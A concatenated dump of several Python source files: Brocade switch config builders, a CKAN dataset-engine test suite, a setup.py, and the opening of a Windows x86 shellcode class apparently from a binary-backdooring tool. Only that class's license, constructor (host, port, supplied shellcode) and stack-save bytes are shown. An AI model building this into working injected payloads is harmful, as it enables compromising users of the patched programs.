callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_retries(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
retries = ET.SubElement(host, "retries")
retries.text = kwargs.pop('retries')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_timeout(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
timeout = ET.SubElement(host, "timeout")
timeout.text = kwargs.pop('timeout')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_basedn(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
basedn = ET.SubElement(host, "basedn")
basedn.text = kwargs.pop('basedn')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_maprole_group_ad_group(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
maprole = ET.SubElement(ldap_server, "maprole")
group = ET.SubElement(maprole, "group")
ad_group = ET.SubElement(group, "ad-group")
ad_group.text = kwargs.pop('ad_group')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_maprole_group_switch_role(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
maprole = ET.SubElement(ldap_server, "maprole")
group = ET.SubElement(maprole, "group")
ad_group_key = ET.SubElement(group, "ad-group")
ad_group_key.text = kwargs.pop('ad_group')
switch_role = ET.SubElement(group, "switch-role")
switch_role.text = kwargs.pop('switch_role')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_min_length(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
min_length = ET.SubElement(password_attributes, "min-length")
min_length.text = kwargs.pop('min_length')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_max_retry(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
max_retry = ET.SubElement(password_attributes, "max-retry")
max_retry.text = kwargs.pop('max_retry')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_max_lockout_duration(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
max_lockout_duration = ET.SubElement(password_attributes, "max-lockout-duration")
max_lockout_duration.text = kwargs.pop('max_lockout_duration')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
upper = ET.SubElement(character_restriction, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
lower = ET.SubElement(character_restriction, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_numeric(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
numeric = ET.SubElement(character_restriction, "numeric")
numeric.text = kwargs.pop('numeric')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_special_char(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
special_char = ET.SubElement(character_restriction, "special-char")
special_char.text = kwargs.pop('special_char')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_admin_lockout_enable(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
admin_lockout_enable = ET.SubElement(password_attributes, "admin-lockout-enable")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def banner_login(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
banner = ET.SubElement(config, "banner", xmlns="urn:brocade.com:mgmt:brocade-aaa")
login = ET.SubElement(banner, "login")
login.text = kwargs.pop('login')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def banner_motd(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
banner = ET.SubElement(config, "banner", xmlns="urn:brocade.com:mgmt:brocade-aaa")
motd = ET.SubElement(banner, "motd")
motd.text = kwargs.pop('motd')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def banner_incoming(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
banner = ET.SubElement(config, "banner", xmlns="urn:brocade.com:mgmt:brocade-aaa")
incoming = ET.SubElement(banner, "incoming")
incoming.text = kwargs.pop('incoming')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_index(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index = ET.SubElement(rule, "index")
index.text = kwargs.pop('index')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
action = ET.SubElement(rule, "action")
action.text = kwargs.pop('action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_operation(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
operation = ET.SubElement(rule, "operation")
operation.text = kwargs.pop('operation')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_role(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
role = ET.SubElement(rule, "role")
role.text = kwargs.pop('role')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_container_cmds_enumList(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
container_cmds = ET.SubElement(cmdlist, "container-cmds")
enumList = ET.SubElement(container_cmds, "enumList")
enumList.text = kwargs.pop('enumList')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_d_interface_fcoe_leaf_interface_fcoe_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_d = ET.SubElement(cmdlist, "interface-d")
interface_fcoe_leaf = ET.SubElement(interface_d, "interface-fcoe-leaf")
interface = ET.SubElement(interface_fcoe_leaf, "interface")
fcoe_leaf = ET.SubElement(interface, "fcoe-leaf")
fcoe_leaf.text = kwargs.pop('fcoe_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_e_interface_te_leaf_interface_tengigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_e = ET.SubElement(cmdlist, "interface-e")
interface_te_leaf = ET.SubElement(interface_e, "interface-te-leaf")
interface = ET.SubElement(interface_te_leaf, "interface")
tengigabitethernet_leaf = ET.SubElement(interface, "tengigabitethernet-leaf")
tengigabitethernet_leaf.text = kwargs.pop('tengigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_h_interface_ge_leaf_interface_gigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_h = ET.SubElement(cmdlist, "interface-h")
interface_ge_leaf = ET.SubElement(interface_h, "interface-ge-leaf")
interface = ET.SubElement(interface_ge_leaf, "interface")
gigabitethernet_leaf = ET.SubElement(interface, "gigabitethernet-leaf")
gigabitethernet_leaf.text = kwargs.pop('gigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_j_interface_pc_leaf_interface_port_channel_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_j = ET.SubElement(cmdlist, "interface-j")
interface_pc_leaf = ET.SubElement(interface_j, "interface-pc-leaf")
interface = ET.SubElement(interface_pc_leaf, "interface")
port_channel_leaf = ET.SubElement(interface, "port-channel-leaf")
port_channel_leaf.text = kwargs.pop('port_channel_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_l_interface_vlan_leaf_interface_vlan_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_l = ET.SubElement(cmdlist, "interface-l")
interface_vlan_leaf = ET.SubElement(interface_l, "interface-vlan-leaf")
interface = ET.SubElement(interface_vlan_leaf, "interface")
vlan_leaf = ET.SubElement(interface, "vlan-leaf")
vlan_leaf.text = kwargs.pop('vlan_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_m_interface_management_leaf_interface_management_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_m = ET.SubElement(cmdlist, "interface-m")
interface_management_leaf = ET.SubElement(interface_m, "interface-management-leaf")
interface = ET.SubElement(interface_management_leaf, "interface")
management_leaf = ET.SubElement(interface, "management-leaf")
management_leaf.text = kwargs.pop('management_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_o_interface_loopback_leaf_interface_loopback_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_o = ET.SubElement(cmdlist, "interface-o")
interface_loopback_leaf = ET.SubElement(interface_o, "interface-loopback-leaf")
interface = ET.SubElement(interface_loopback_leaf, "interface")
loopback_leaf = ET.SubElement(interface, "loopback-leaf")
loopback_leaf.text = kwargs.pop('loopback_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_q_interface_ve_leaf_interface_ve_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_q = ET.SubElement(cmdlist, "interface-q")
interface_ve_leaf = ET.SubElement(interface_q, "interface-ve-leaf")
interface = ET.SubElement(interface_ve_leaf, "interface")
ve_leaf = ET.SubElement(interface, "ve-leaf")
ve_leaf.text = kwargs.pop('ve_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_s_interface_fc_leaf_interface_fibrechannel_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_s = ET.SubElement(cmdlist, "interface-s")
interface_fc_leaf = ET.SubElement(interface_s, "interface-fc-leaf")
interface = ET.SubElement(interface_fc_leaf, "interface")
fibrechannel_leaf = ET.SubElement(interface, "fibrechannel-leaf")
fibrechannel_leaf.text = kwargs.pop('fibrechannel_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_u_interface_fe_leaf_interface_fortygigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_u = ET.SubElement(cmdlist, "interface-u")
interface_fe_leaf = ET.SubElement(interface_u, "interface-fe-leaf")
interface = ET.SubElement(interface_fe_leaf, "interface")
fortygigabitethernet_leaf = ET.SubElement(interface, "fortygigabitethernet-leaf")
fortygigabitethernet_leaf.text = kwargs.pop('fortygigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_w_interface_he_leaf_interface_hundredgigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_w = ET.SubElement(cmdlist, "interface-w")
interface_he_leaf = ET.SubElement(interface_w, "interface-he-leaf")
interface = ET.SubElement(interface_he_leaf, "interface")
hundredgigabitethernet_leaf = ET.SubElement(interface, "hundredgigabitethernet-leaf")
hundredgigabitethernet_leaf.text = kwargs.pop('hundredgigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def root_sa_root_enable(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
root_sa = ET.SubElement(config, "root-sa", xmlns="urn:brocade.com:mgmt:brocade-aaa")
root = ET.SubElement(root_sa, "root")
enable = ET.SubElement(root, "enable")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def root_sa_root_access(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
root_sa = ET.SubElement(config, "root-sa", xmlns="urn:brocade.com:mgmt:brocade-aaa")
root = ET.SubElement(root_sa, "root")
access = ET.SubElement(root, "access")
access.text = kwargs.pop('access')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_alias_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
alias = ET.SubElement(alias_config, "alias")
name = ET.SubElement(alias, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_alias_expansion(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
alias = ET.SubElement(alias_config, "alias")
name_key = ET.SubElement(alias, "name")
name_key.text = kwargs.pop('name')
expansion = ET.SubElement(alias, "expansion")
expansion.text = kwargs.pop('expansion')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_user_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
user = ET.SubElement(alias_config, "user")
name = ET.SubElement(user, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_user_alias_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
user = ET.SubElement(alias_config, "user")
name_key = ET.SubElement(user, "name")
name_key.text = kwargs.pop('name')
alias = ET.SubElement(user, "alias")
        name = ET.SubElement(alias, "name")
        # 'name' was already popped above for the user key; popping it again
        # raises KeyError, so the alias leaf reads a distinct keyword
        # ('alias_name' is an assumed argument name).
        name.text = kwargs.pop('alias_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_user_alias_expansion(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
user = ET.SubElement(alias_config, "user")
name_key = ET.SubElement(user, "name")
name_key.text = kwargs.pop('name')
alias = ET.SubElement(user, "alias")
        name_key = ET.SubElement(alias, "name")
        # A second pop of 'name' would raise KeyError; the alias key reads a
        # distinct keyword ('alias_name' is an assumed argument name).
        name_key.text = kwargs.pop('alias_name')
expansion = ET.SubElement(alias, "expansion")
expansion.text = kwargs.pop('expansion')
callback = kwargs.pop('callback', self._callback)
return callback(config)
| BRCDcomm/pynos | pynos/versions/ver_7/ver_7_0_0/yang/brocade_aaa.py | Python | apache-2.0 | 91,486 |
import os
import random
import string
import unittest
import requests
from tethys_dataset_services.engines import CkanDatasetEngine
try:
from tethys_dataset_services.tests.test_config import TEST_CKAN_DATASET_SERVICE
except ImportError:
    print('ERROR: To perform tests, you must create a file in the "tests" package called "test_config.py". In this '
          'file provide a dictionary called "TEST_CKAN_DATASET_SERVICE" with keys "ENDPOINT", "APIKEY" and "USERNAME".')
exit(1)
def random_string_generator(size):
chars = string.ascii_lowercase + string.digits
return ''.join(random.choice(chars) for _ in range(size))
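# For example, random_string_generator(10) might return 'k3x9q0am2z' -- ten
# characters drawn from lowercase letters and digits.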
class TestCkanDatasetEngine(unittest.TestCase):
def setUp(self):
# Auth
self.endpoint = TEST_CKAN_DATASET_SERVICE['ENDPOINT']
self.apikey = TEST_CKAN_DATASET_SERVICE['APIKEY']
self.username = TEST_CKAN_DATASET_SERVICE['USERNAME']
# Files
self.tests_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
self.files_root = os.path.join(self.tests_root, 'files')
self.support_root = os.path.join(self.tests_root, 'support')
# Create Test Engine
self.engine = CkanDatasetEngine(endpoint=self.endpoint,
apikey=self.apikey)
# Create Test Organization
self.test_org = random_string_generator(10)
data_dict = {
'name': self.test_org,
'users': [{'name': self.username}]
}
url, data, headers = self.engine._prepare_request(
'organization_create', data_dict=data_dict, apikey=self.apikey
)
status_code, response_text = self.engine._execute_request(url, data, headers)
if status_code != 200:
            raise requests.RequestException('Unable to create organization: {}'.format(response_text))
# Create Test Dataset
self.test_dataset_name = random_string_generator(10)
dataset_result = self.engine.create_dataset(name=self.test_dataset_name, version='1.0', owner_org=self.test_org)
if not dataset_result['success']:
raise requests.RequestException('Unable to create test dataset: {}'.format(dataset_result['error']))
self.test_dataset = dataset_result['result']
# Create Test Resource
self.test_resource_name = random_string_generator(10)
self.test_resource_url = 'http://home.byu.edu'
resource_result = self.engine.create_resource(self.test_dataset_name,
url=self.test_resource_url, format='zip')
if not resource_result['success']:
raise requests.RequestException('Unable to create test resource: {}'.format(resource_result['error']))
self.test_resource = resource_result['result']
    def tearDown(self):
        # Delete the test dataset; its resources are removed with it
        self.engine.delete_dataset(dataset_id=self.test_dataset_name)
def test_create_dataset(self):
# Setup
new_dataset_name = random_string_generator(10)
# Execute
result = self.engine.create_dataset(name=new_dataset_name, owner_org=self.test_org)
# Verify Success
self.assertTrue(result['success'])
        # The result should echo back the new dataset's name
        self.assertEqual(new_dataset_name, result['result']['name'])
# TEST search_datasets
result = self.engine.search_datasets(query={'name': new_dataset_name}, console=False)
# Verify Success
self.assertTrue(result['success'])
# Check search results
search_results = result['result']['results']
self.assertIn(new_dataset_name, search_results[0]['name'])
self.assertIn(self.test_org, search_results[0]['organization']['name'])
# TEST list_datasets
# Execute
result = self.engine.list_datasets()
# Verify Success
self.assertTrue(result['success'])
self.assertIn(new_dataset_name, result['result'])
# Delete
result = self.engine.delete_dataset(dataset_id=new_dataset_name)
# Check if success
self.assertTrue(result['success'])
def test_create_resource_file(self):
# Prepare
file_name = 'upload_test.txt'
save_name = random_string_generator(10)
file_to_upload = os.path.join(self.support_root, file_name)
# Execute
result = self.engine.create_resource(dataset_id=self.test_dataset_name,
name=save_name,
file=file_to_upload)
# Verify Success
self.assertTrue(result['success'])
        # Verify name and url_type ('upload' marks a file upload)
self.assertIn(save_name, result['result']['name'])
self.assertEqual(result['result']['url_type'], 'upload')
# TEST search resource
# Execute
result = self.engine.search_resources(query={'name': save_name})
# Verify Success
self.assertTrue(result['success'])
self.assertIn(save_name, result['result']['results'][-1]['name'])
# Delete
result = self.engine.delete_resource(resource_id=result['result']['results'][-1]['id'])
self.assertTrue(result['success'])
def test_create_resource_url(self):
# Prepare
new_resource_name = random_string_generator(10)
new_resource_url = 'http://home.byu.edu/'
# Execute
result = self.engine.create_resource(dataset_id=self.test_dataset_name,
url=new_resource_url,
name=new_resource_name)
# Verify Success
self.assertTrue(result['success'])
        # Verify name and that the resource URL was stored as given
self.assertIn(new_resource_name, result['result']['name'])
self.assertEqual(result['result']['url'], new_resource_url)
# TEST search resource
# Execute
result = self.engine.search_resources(query={'name': new_resource_name})
# Verify Success
self.assertTrue(result['success'])
self.assertIn(new_resource_name, result['result']['results'][-1]['name'])
self.assertIn(new_resource_url, result['result']['results'][-1]['url'])
# Delete
result = self.engine.delete_resource(resource_id=result['result']['results'][-1]['id'])
self.assertTrue(result['success'])
def test_update_dataset(self):
# Setup
notes = random_string_generator(10)
author = random_string_generator(5)
# Execute
result = self.engine.update_dataset(dataset_id=self.test_dataset_name,
author=author, notes=notes)
# Verify Success
self.assertTrue(result['success'])
# Verify new property
self.assertEqual(result['result']['author'], author)
self.assertEqual(result['result']['notes'], notes)
# TEST get_dataset
# Execute
result = self.engine.get_dataset(dataset_id=self.test_dataset_name)
# Verify Success
self.assertTrue(result['success'])
# Verify Name
self.assertEqual(result['result']['name'], self.test_dataset_name)
self.assertEqual(result['result']['author'], author)
self.assertEqual(result['result']['notes'], notes)
# TEST download_dataset
location = self.files_root
result = self.engine.download_dataset(self.test_dataset_name,
location=location)
        # download_dataset returns a list of file paths; each should end in .zip
self.assertIn('.zip', result[0][-4:].lower())
download_file = os.path.basename(result[0])
location_final = os.path.join(self.files_root, download_file)
# Delete the file
if os.path.isfile(location_final):
os.remove(location_final)
else:
raise AssertionError('No file has been downloaded')
# TEST delete_dataset
# Execute
result = self.engine.delete_dataset(dataset_id=self.test_dataset_name)
# Confirm Success
self.assertTrue(result['success'])
        # Delete requests should return nothing
        self.assertIsNone(result['result'])
def test_update_resource(self):
# Get Resource ID
result = self.engine.get_dataset(dataset_id=self.test_dataset_name)
resource_id = result['result']['resources'][0]['id']
# Setup
file_name = 'upload_test.txt'
file_to_upload = os.path.join(self.support_root, file_name)
description_new = random_string_generator(10)
# Execute
result = self.engine.update_resource(resource_id=resource_id,
file=file_to_upload,
description=description_new)
# Verify Success
self.assertTrue(result['success'])
# Verify Name (should be the same as the file uploaded by default)
self.assertEqual(result['result']['name'], file_name)
self.assertEqual(result['result']['description'], description_new)
# TEST get_resource
# Execute
result = self.engine.get_resource(resource_id=resource_id)
# Verify Success
self.assertTrue(result['success'])
# Verify Properties
self.assertEqual(result['result']['name'], file_name)
self.assertEqual(result['result']['description'], description_new)
# TEST download_resource
location = self.files_root
result = self.engine.download_resource(resource_id=resource_id, location=location)
        # download_resource returns a single file path, which should end in .zip
        self.assertIn('.zip', result[-4:].lower())
download_file = os.path.basename(result)
location_final = os.path.join(self.files_root, download_file)
# Delete the file
if os.path.isfile(location_final):
os.remove(location_final)
else:
raise AssertionError('No file has been downloaded')
# TEST delete_resource
# Execute
result = self.engine.delete_resource(resource_id=resource_id)
# Verify Success
self.assertTrue(result['success'])
        # Delete requests should return nothing
        self.assertIsNone(result['result'])
def test_validate(self):
self.engine.validate()
def test_validate_status_code(self):
self.engine2 = CkanDatasetEngine(endpoint="http://localhost:5000/api/a/action/",
apikey=TEST_CKAN_DATASET_SERVICE['APIKEY'])
self.assertRaises(AssertionError, self.engine2.validate)
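# A sketch of running these end-to-end tests against a live CKAN instance,
# assuming test_config.py exists with ENDPOINT, APIKEY and USERNAME filled in:
#
#   python -m unittest tethys_dataset_services.tests.e2e_tests.ckan_engine_e2e_tests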
| tethysplatform/tethys_dataset_services | tethys_dataset_services/tests/e2e_tests/ckan_engine_e2e_tests.py | Python | bsd-2-clause | 10,844 |
import setuptools
setuptools.setup(
name="sirius",
version="0.5",
author="",
author_email="[email protected]",
description="pySIRIUS",
url="https://github.com/electronic_structure/SIRIUS",
packages=['sirius'],
install_requires=['mpi4py', 'voluptuous', 'numpy', 'h5py', 'scipy', 'PyYAML'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
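# Standard setuptools workflow; from this directory the module installs with:
#
#   pip install .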
| electronic-structure/sirius | python_module/setup.py | Python | bsd-2-clause | 499 |
'''
Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
##########################################################
# BEGIN win32 shellcodes #
##########################################################
import sys
import struct
from intelmodules import eat_code_caves
class winI32_shellcode():
"""
Windows Intel x32 shellcode class
"""
def __init__(self, HOST, PORT, SUPPLIED_SHELLCODE):
#could take this out HOST/PORT and put into each shellcode function
self.HOST = HOST
self.PORT = PORT
self.shellcode = ""
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.stackpreserve = "\x90\x90\x60\x9c"
self.stackrestore = "\x9d\x61"
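        # \x60\x9c is PUSHAD/PUSHFD and \x9d\x61 is POPFD/POPAD: payloads are
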